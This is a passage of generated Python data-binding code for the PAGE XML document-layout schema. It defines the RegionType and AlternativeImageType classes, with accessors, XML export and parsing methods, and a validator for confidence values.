__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('continuation', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('AlternativeImage', 'AlternativeImageType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'AlternativeImage', 'type': 'AlternativeImageType'}, None),
MemberSpec_('Coords', 'CoordsType', 0, 0, {'name': 'Coords', 'type': 'CoordsType'}, None),
MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
MemberSpec_('Roles', 'RolesType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'Roles', 'type': 'RolesType'}, None),
MemberSpec_('TextRegion', 'TextRegionType', 1, 1, {'name': 'TextRegion', 'type': 'TextRegionType'}, 7),
MemberSpec_('ImageRegion', 'ImageRegionType', 1, 1, {'name': 'ImageRegion', 'type': 'ImageRegionType'}, 7),
MemberSpec_('LineDrawingRegion', 'LineDrawingRegionType', 1, 1, {'name': 'LineDrawingRegion', 'type': 'LineDrawingRegionType'}, 7),
MemberSpec_('GraphicRegion', 'GraphicRegionType', 1, 1, {'name': 'GraphicRegion', 'type': 'GraphicRegionType'}, 7),
MemberSpec_('TableRegion', 'TableRegionType', 1, 1, {'name': 'TableRegion', 'type': 'TableRegionType'}, 7),
MemberSpec_('ChartRegion', 'ChartRegionType', 1, 1, {'name': 'ChartRegion', 'type': 'ChartRegionType'}, 7),
MemberSpec_('SeparatorRegion', 'SeparatorRegionType', 1, 1, {'name': 'SeparatorRegion', 'type': 'SeparatorRegionType'}, 7),
MemberSpec_('MathsRegion', 'MathsRegionType', 1, 1, {'name': 'MathsRegion', 'type': 'MathsRegionType'}, 7),
MemberSpec_('ChemRegion', 'ChemRegionType', 1, 1, {'name': 'ChemRegion', 'type': 'ChemRegionType'}, 7),
MemberSpec_('MusicRegion', 'MusicRegionType', 1, 1, {'name': 'MusicRegion', 'type': 'MusicRegionType'}, 7),
MemberSpec_('AdvertRegion', 'AdvertRegionType', 1, 1, {'name': 'AdvertRegion', 'type': 'AdvertRegionType'}, 7),
MemberSpec_('NoiseRegion', 'NoiseRegionType', 1, 1, {'name': 'NoiseRegion', 'type': 'NoiseRegionType'}, 7),
MemberSpec_('UnknownRegion', 'UnknownRegionType', 1, 1, {'name': 'UnknownRegion', 'type': 'UnknownRegionType'}, 7),
MemberSpec_('CustomRegion', 'CustomRegionType', 1, 1, {'name': 'CustomRegion', 'type': 'CustomRegionType'}, 7),
]
subclass = None
superclass = None
def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, extensiontype_=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.id = _cast(None, id)
self.id_nsprefix_ = None
self.custom = _cast(None, custom)
self.custom_nsprefix_ = None
self.comments = _cast(None, comments)
self.comments_nsprefix_ = None
self.continuation = _cast(bool, continuation)
self.continuation_nsprefix_ = None
if AlternativeImage is None:
self.AlternativeImage = []
else:
self.AlternativeImage = AlternativeImage
self.AlternativeImage_nsprefix_ = "pc"
self.Coords = Coords
self.Coords_nsprefix_ = "pc"
self.UserDefined = UserDefined
self.UserDefined_nsprefix_ = "pc"
if Labels is None:
self.Labels = []
else:
self.Labels = Labels
self.Labels_nsprefix_ = "pc"
self.Roles = Roles
self.Roles_nsprefix_ = "pc"
if TextRegion is None:
self.TextRegion = []
else:
self.TextRegion = TextRegion
self.TextRegion_nsprefix_ = "pc"
if ImageRegion is None:
self.ImageRegion = []
else:
self.ImageRegion = ImageRegion
self.ImageRegion_nsprefix_ = "pc"
if LineDrawingRegion is None:
self.LineDrawingRegion = []
else:
self.LineDrawingRegion = LineDrawingRegion
self.LineDrawingRegion_nsprefix_ = "pc"
if GraphicRegion is None:
self.GraphicRegion = []
else:
self.GraphicRegion = GraphicRegion
self.GraphicRegion_nsprefix_ = "pc"
if TableRegion is None:
self.TableRegion = []
else:
self.TableRegion = TableRegion
self.TableRegion_nsprefix_ = "pc"
if ChartRegion is None:
self.ChartRegion = []
else:
self.ChartRegion = ChartRegion
self.ChartRegion_nsprefix_ = "pc"
if SeparatorRegion is None:
self.SeparatorRegion = []
else:
self.SeparatorRegion = SeparatorRegion
self.SeparatorRegion_nsprefix_ = "pc"
if MathsRegion is None:
self.MathsRegion = []
else:
self.MathsRegion = MathsRegion
self.MathsRegion_nsprefix_ = "pc"
if ChemRegion is None:
self.ChemRegion = []
else:
self.ChemRegion = ChemRegion
self.ChemRegion_nsprefix_ = "pc"
if MusicRegion is None:
self.MusicRegion = []
else:
self.MusicRegion = MusicRegion
self.MusicRegion_nsprefix_ = "pc"
if AdvertRegion is None:
self.AdvertRegion = []
else:
self.AdvertRegion = AdvertRegion
self.AdvertRegion_nsprefix_ = "pc"
if NoiseRegion is None:
self.NoiseRegion = []
else:
self.NoiseRegion = NoiseRegion
self.NoiseRegion_nsprefix_ = "pc"
if UnknownRegion is None:
self.UnknownRegion = []
else:
self.UnknownRegion = UnknownRegion
self.UnknownRegion_nsprefix_ = "pc"
if CustomRegion is None:
self.CustomRegion = []
else:
self.CustomRegion = CustomRegion
self.CustomRegion_nsprefix_ = "pc"
self.extensiontype_ = extensiontype_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, RegionType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if RegionType.subclass:
return RegionType.subclass(*args_, **kwargs_)
else:
return RegionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_AlternativeImage(self):
return self.AlternativeImage
def set_AlternativeImage(self, AlternativeImage):
self.AlternativeImage = AlternativeImage
def add_AlternativeImage(self, value):
self.AlternativeImage.append(value)
def insert_AlternativeImage_at(self, index, value):
self.AlternativeImage.insert(index, value)
def replace_AlternativeImage_at(self, index, value):
self.AlternativeImage[index] = value
def get_Coords(self):
return self.Coords
def set_Coords(self, Coords):
self.Coords = Coords
def get_UserDefined(self):
return self.UserDefined
def set_UserDefined(self, UserDefined):
self.UserDefined = UserDefined
def get_Labels(self):
return self.Labels
def set_Labels(self, Labels):
self.Labels = Labels
def add_Labels(self, value):
self.Labels.append(value)
def insert_Labels_at(self, index, value):
self.Labels.insert(index, value)
def replace_Labels_at(self, index, value):
self.Labels[index] = value
def get_Roles(self):
return self.Roles
def set_Roles(self, Roles):
self.Roles = Roles
def get_TextRegion(self):
return self.TextRegion
def set_TextRegion(self, TextRegion):
self.TextRegion = TextRegion
def add_TextRegion(self, value):
self.TextRegion.append(value)
def insert_TextRegion_at(self, index, value):
self.TextRegion.insert(index, value)
def replace_TextRegion_at(self, index, value):
self.TextRegion[index] = value
def get_ImageRegion(self):
return self.ImageRegion
def set_ImageRegion(self, ImageRegion):
self.ImageRegion = ImageRegion
def add_ImageRegion(self, value):
self.ImageRegion.append(value)
def insert_ImageRegion_at(self, index, value):
self.ImageRegion.insert(index, value)
def replace_ImageRegion_at(self, index, value):
self.ImageRegion[index] = value
def get_LineDrawingRegion(self):
return self.LineDrawingRegion
def set_LineDrawingRegion(self, LineDrawingRegion):
self.LineDrawingRegion = LineDrawingRegion
def add_LineDrawingRegion(self, value):
self.LineDrawingRegion.append(value)
def insert_LineDrawingRegion_at(self, index, value):
self.LineDrawingRegion.insert(index, value)
def replace_LineDrawingRegion_at(self, index, value):
self.LineDrawingRegion[index] = value
def get_GraphicRegion(self):
return self.GraphicRegion
def set_GraphicRegion(self, GraphicRegion):
self.GraphicRegion = GraphicRegion
def add_GraphicRegion(self, value):
self.GraphicRegion.append(value)
def insert_GraphicRegion_at(self, index, value):
self.GraphicRegion.insert(index, value)
def replace_GraphicRegion_at(self, index, value):
self.GraphicRegion[index] = value
def get_TableRegion(self):
return self.TableRegion
def set_TableRegion(self, TableRegion):
self.TableRegion = TableRegion
def add_TableRegion(self, value):
self.TableRegion.append(value)
def insert_TableRegion_at(self, index, value):
self.TableRegion.insert(index, value)
def replace_TableRegion_at(self, index, value):
self.TableRegion[index] = value
def get_ChartRegion(self):
return self.ChartRegion
def set_ChartRegion(self, ChartRegion):
self.ChartRegion = ChartRegion
def add_ChartRegion(self, value):
self.ChartRegion.append(value)
def insert_ChartRegion_at(self, index, value):
self.ChartRegion.insert(index, value)
def replace_ChartRegion_at(self, index, value):
self.ChartRegion[index] = value
def get_SeparatorRegion(self):
return self.SeparatorRegion
def set_SeparatorRegion(self, SeparatorRegion):
self.SeparatorRegion = SeparatorRegion
def add_SeparatorRegion(self, value):
self.SeparatorRegion.append(value)
def insert_SeparatorRegion_at(self, index, value):
self.SeparatorRegion.insert(index, value)
def replace_SeparatorRegion_at(self, index, value):
self.SeparatorRegion[index] = value
def get_MathsRegion(self):
return self.MathsRegion
def set_MathsRegion(self, MathsRegion):
self.MathsRegion = MathsRegion
def add_MathsRegion(self, value):
self.MathsRegion.append(value)
def insert_MathsRegion_at(self, index, value):
self.MathsRegion.insert(index, value)
def replace_MathsRegion_at(self, index, value):
self.MathsRegion[index] = value
def get_ChemRegion(self):
return self.ChemRegion
def set_ChemRegion(self, ChemRegion):
self.ChemRegion = ChemRegion
def add_ChemRegion(self, value):
self.ChemRegion.append(value)
def insert_ChemRegion_at(self, index, value):
self.ChemRegion.insert(index, value)
def replace_ChemRegion_at(self, index, value):
self.ChemRegion[index] = value
def get_MusicRegion(self):
return self.MusicRegion
def set_MusicRegion(self, MusicRegion):
self.MusicRegion = MusicRegion
def add_MusicRegion(self, value):
self.MusicRegion.append(value)
def insert_MusicRegion_at(self, index, value):
self.MusicRegion.insert(index, value)
def replace_MusicRegion_at(self, index, value):
self.MusicRegion[index] = value
def get_AdvertRegion(self):
return self.AdvertRegion
def set_AdvertRegion(self, AdvertRegion):
self.AdvertRegion = AdvertRegion
def add_AdvertRegion(self, value):
self.AdvertRegion.append(value)
def insert_AdvertRegion_at(self, index, value):
self.AdvertRegion.insert(index, value)
def replace_AdvertRegion_at(self, index, value):
self.AdvertRegion[index] = value
def get_NoiseRegion(self):
return self.NoiseRegion
def set_NoiseRegion(self, NoiseRegion):
self.NoiseRegion = NoiseRegion
def add_NoiseRegion(self, value):
self.NoiseRegion.append(value)
def insert_NoiseRegion_at(self, index, value):
self.NoiseRegion.insert(index, value)
def replace_NoiseRegion_at(self, index, value):
self.NoiseRegion[index] = value
def get_UnknownRegion(self):
return self.UnknownRegion
def set_UnknownRegion(self, UnknownRegion):
self.UnknownRegion = UnknownRegion
def add_UnknownRegion(self, value):
self.UnknownRegion.append(value)
def insert_UnknownRegion_at(self, index, value):
self.UnknownRegion.insert(index, value)
def replace_UnknownRegion_at(self, index, value):
self.UnknownRegion[index] = value
def get_CustomRegion(self):
return self.CustomRegion
def set_CustomRegion(self, CustomRegion):
self.CustomRegion = CustomRegion
def add_CustomRegion(self, value):
self.CustomRegion.append(value)
def insert_CustomRegion_at(self, index, value):
self.CustomRegion.insert(index, value)
def replace_CustomRegion_at(self, index, value):
self.CustomRegion[index] = value
def get_id(self):
return self.id
def set_id(self, id):
self.id = id
def get_custom(self):
return self.custom
def set_custom(self, custom):
self.custom = custom
def get_comments(self):
return self.comments
def set_comments(self, comments):
self.comments = comments
def get_continuation(self):
return self.continuation
def set_continuation(self, continuation):
self.continuation = continuation
def get_extensiontype_(self): return self.extensiontype_
def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
def hasContent_(self):
if (
self.AlternativeImage or
self.Coords is not None or
self.UserDefined is not None or
self.Labels or
self.Roles is not None or
self.TextRegion or
self.ImageRegion or
self.LineDrawingRegion or
self.GraphicRegion or
self.TableRegion or
self.ChartRegion or
self.SeparatorRegion or
self.MathsRegion or
self.ChemRegion or
self.MusicRegion or
self.AdvertRegion or
self.NoiseRegion or
self.UnknownRegion or
self.CustomRegion
):
return True
else:
return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RegionType', pretty_print=True):
        """Serialise this element (attributes and children) as XML to *outfile*.

        ``level`` controls indentation depth; ``name_`` is the tag name to
        emit, overridden by ``original_tagname_`` when this instance was
        built from a parsed document.
        """
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('RegionType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Prefer the tag name this object was originally parsed from.
        if self.original_tagname_ is not None and name_ == 'RegionType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='RegionType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='RegionType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='RegionType'):
        """Write this element's XML attributes to *outfile*.

        ``already_processed`` accumulates attribute names so cooperating
        subclasses do not emit the same attribute twice.
        """
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
        if self.custom is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
        if self.comments is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
        if self.continuation is not None and 'continuation' not in already_processed:
            already_processed.add('continuation')
            outfile.write(' continuation="%s"' % self.gds_format_boolean(self.continuation, input_name='continuation'))
        if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
            # Qualify a bare type name with its captured namespace prefix.
            if ":" not in self.extensiontype_:
                imported_ns_type_prefix_ = GenerateDSNamespaceTypePrefixes_.get(self.extensiontype_, '')
                outfile.write(' xsi:type="%s%s"' % (imported_ns_type_prefix_, self.extensiontype_))
            else:
                outfile.write(' xsi:type="%s"' % self.extensiontype_)
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RegionType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for AlternativeImage_ in self.AlternativeImage:
namespaceprefix_ = self.AlternativeImage_nsprefix_ + ':' if (UseCapturedNS_ and self.AlternativeImage_nsprefix_) else ''
AlternativeImage_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='AlternativeImage', pretty_print=pretty_print)
if self.Coords is not None:
namespaceprefix_ = self.Coords_nsprefix_ + ':' if (UseCapturedNS_ and self.Coords_nsprefix_) else ''
self.Coords.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Coords', pretty_print=pretty_print)
if self.UserDefined is not None:
namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
for Labels_ in self.Labels:
namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
if self.Roles is not None:
namespaceprefix_ = self.Roles_nsprefix_ + ':' if (UseCapturedNS_ and self.Roles_nsprefix_) else ''
self.Roles.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Roles', pretty_print=pretty_print)
for TextRegion_ in self.TextRegion:
namespaceprefix_ = self.TextRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.TextRegion_nsprefix_) else ''
TextRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextRegion', pretty_print=pretty_print)
for ImageRegion_ in self.ImageRegion:
namespaceprefix_ = self.ImageRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.ImageRegion_nsprefix_) else ''
ImageRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='ImageRegion', pretty_print=pretty_print)
for LineDrawingRegion_ in self.LineDrawingRegion:
namespaceprefix_ = self.LineDrawingRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.LineDrawingRegion_nsprefix_) else ''
LineDrawingRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='LineDrawingRegion', pretty_print=pretty_print)
for GraphicRegion_ in self.GraphicRegion:
namespaceprefix_ = self.GraphicRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.GraphicRegion_nsprefix_) else ''
GraphicRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='GraphicRegion', pretty_print=pretty_print)
for TableRegion_ in self.TableRegion:
namespaceprefix_ = self.TableRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.TableRegion_nsprefix_) else ''
TableRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TableRegion', pretty_print=pretty_print)
for ChartRegion_ in self.ChartRegion:
namespaceprefix_ = self.ChartRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.ChartRegion_nsprefix_) else ''
ChartRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='ChartRegion', pretty_print=pretty_print)
for SeparatorRegion_ in self.SeparatorRegion:
namespaceprefix_ = self.SeparatorRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.SeparatorRegion_nsprefix_) else ''
SeparatorRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='SeparatorRegion', pretty_print=pretty_print)
for MathsRegion_ in self.MathsRegion:
namespaceprefix_ = self.MathsRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.MathsRegion_nsprefix_) else ''
MathsRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='MathsRegion', pretty_print=pretty_print)
for ChemRegion_ in self.ChemRegion:
namespaceprefix_ = self.ChemRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.ChemRegion_nsprefix_) else ''
ChemRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='ChemRegion', pretty_print=pretty_print)
for MusicRegion_ in self.MusicRegion:
namespaceprefix_ = self.MusicRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.MusicRegion_nsprefix_) else ''
MusicRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='MusicRegion', pretty_print=pretty_print)
for AdvertRegion_ in self.AdvertRegion:
namespaceprefix_ = self.AdvertRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.AdvertRegion_nsprefix_) else ''
AdvertRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='AdvertRegion', pretty_print=pretty_print)
for NoiseRegion_ in self.NoiseRegion:
namespaceprefix_ = self.NoiseRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.NoiseRegion_nsprefix_) else ''
NoiseRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='NoiseRegion', pretty_print=pretty_print)
for UnknownRegion_ in self.UnknownRegion:
namespaceprefix_ = self.UnknownRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.UnknownRegion_nsprefix_) else ''
UnknownRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UnknownRegion', pretty_print=pretty_print)
for CustomRegion_ in self.CustomRegion:
namespaceprefix_ = self.CustomRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.CustomRegion_nsprefix_) else ''
CustomRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='CustomRegion', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this object from an ElementTree/lxml *node*; return self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            # Strip any namespace from the child's tag before dispatching.
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read this element's XML attributes (id, custom, comments,
        continuation, xsi:type) from *node*."""
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
        value = find_attr_value_('custom', node)
        if value is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            self.custom = value
        value = find_attr_value_('comments', node)
        if value is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            self.comments = value
        value = find_attr_value_('continuation', node)
        if value is not None and 'continuation' not in already_processed:
            already_processed.add('continuation')
            # xsd:boolean lexical space: 'true'/'false' and '1'/'0' only.
            if value in ('true', '1'):
                self.continuation = True
            elif value in ('false', '0'):
                self.continuation = False
            else:
                raise_parse_error(node, 'Bad boolean attribute')
        value = find_attr_value_('xsi:type', node)
        if value is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            self.extensiontype_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'AlternativeImage':
obj_ = AlternativeImageType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.AlternativeImage.append(obj_)
obj_.original_tagname_ = 'AlternativeImage'
elif nodeName_ == 'Coords':
obj_ = CoordsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Coords = obj_
obj_.original_tagname_ = 'Coords'
elif nodeName_ == 'UserDefined':
obj_ = UserDefinedType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UserDefined = obj_
obj_.original_tagname_ = 'UserDefined'
elif nodeName_ == 'Labels':
obj_ = LabelsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Labels.append(obj_)
obj_.original_tagname_ = 'Labels'
elif nodeName_ == 'Roles':
obj_ = RolesType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Roles = obj_
obj_.original_tagname_ = 'Roles'
elif nodeName_ == 'TextRegion':
obj_ = TextRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextRegion.append(obj_)
obj_.original_tagname_ = 'TextRegion'
elif nodeName_ == 'ImageRegion':
obj_ = ImageRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.ImageRegion.append(obj_)
obj_.original_tagname_ = 'ImageRegion'
elif nodeName_ == 'LineDrawingRegion':
obj_ = LineDrawingRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.LineDrawingRegion.append(obj_)
obj_.original_tagname_ = 'LineDrawingRegion'
elif nodeName_ == 'GraphicRegion':
obj_ = GraphicRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.GraphicRegion.append(obj_)
obj_.original_tagname_ = 'GraphicRegion'
elif nodeName_ == 'TableRegion':
obj_ = TableRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TableRegion.append(obj_)
obj_.original_tagname_ = 'TableRegion'
elif nodeName_ == 'ChartRegion':
obj_ = ChartRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.ChartRegion.append(obj_)
obj_.original_tagname_ = 'ChartRegion'
elif nodeName_ == 'SeparatorRegion':
obj_ = SeparatorRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.SeparatorRegion.append(obj_)
obj_.original_tagname_ = 'SeparatorRegion'
elif nodeName_ == 'MathsRegion':
obj_ = MathsRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.MathsRegion.append(obj_)
obj_.original_tagname_ = 'MathsRegion'
elif nodeName_ == 'ChemRegion':
obj_ = ChemRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.ChemRegion.append(obj_)
obj_.original_tagname_ = 'ChemRegion'
elif nodeName_ == 'MusicRegion':
obj_ = MusicRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.MusicRegion.append(obj_)
obj_.original_tagname_ = 'MusicRegion'
elif nodeName_ == 'AdvertRegion':
obj_ = AdvertRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.AdvertRegion.append(obj_)
obj_.original_tagname_ = 'AdvertRegion'
elif nodeName_ == 'NoiseRegion':
obj_ = NoiseRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.NoiseRegion.append(obj_)
obj_.original_tagname_ = 'NoiseRegion'
elif nodeName_ == 'UnknownRegion':
obj_ = UnknownRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UnknownRegion.append(obj_)
obj_.original_tagname_ = 'UnknownRegion'
elif nodeName_ == 'CustomRegion':
obj_ = CustomRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.CustomRegion.append(obj_)
obj_.original_tagname_ = 'CustomRegion'
def get_polygon(self):
'''
Get polygon from element which is parent of a Coords element
'''
points = [point for point in self.Coords.points.split(' ')]
return [[int(coord) for coord in point.split(',')] for point in points]
def get_polygon_string(self):
'''
Get polygon string from element which is parent of a Coords element
'''
return self.Coords.points.replace(' ', ',')
# end class RegionType
class AlternativeImageType(GeneratedsSuper):
    """An alternative rendition of the parent element's image.

    The element carries XML attributes only (no child elements):

        filename -- required; location of the alternative image.
        comments -- optional free-text remarks.
        conf     -- optional confidence value between 0 and 1
                    (pc:ConfSimpleType).
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('filename', 'string', 0, 0, {'use': 'required'}),
        MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('conf', 'pc:ConfSimpleType', 0, 1, {'use': 'optional'}),
    ]
    subclass = None
    superclass = None
    def __init__(self, filename=None, comments=None, conf=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.filename = _cast(None, filename)
        self.filename_nsprefix_ = None
        self.comments = _cast(None, comments)
        self.comments_nsprefix_ = None
        # conf is coerced to float when supplied.
        self.conf = _cast(float, conf)
        self.conf_nsprefix_ = None
    def factory(*args_, **kwargs_):
        """Create an instance, honouring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, AlternativeImageType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if AlternativeImageType.subclass:
            return AlternativeImageType.subclass(*args_, **kwargs_)
        else:
            return AlternativeImageType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_filename(self):
        return self.filename
    def set_filename(self, filename):
        self.filename = filename
    def get_comments(self):
        return self.comments
    def set_comments(self, comments):
        self.comments = comments
    def get_conf(self):
        return self.conf
    def set_conf(self, conf):
        self.conf = conf
    def validate_ConfSimpleType(self, value):
        """Validate *value* against pc:ConfSimpleType (a float restricted to
        the inclusive range [0, 1]).

        Problems are reported through ``self.gds_collector_``.  Returns
        False when *value* is not a float at all; range violations only add
        collector messages (matching the generateDS convention).
        """
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, float):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (float)' % {"value": value, "lineno": lineno, })
                return False
            if value < 0:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
            if value > 1:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
    def hasContent_(self):
        # This element never has child content (attributes only).  The
        # generated original tested an always-false empty condition
        # ('if ():'); make the behavior explicit.
        return False
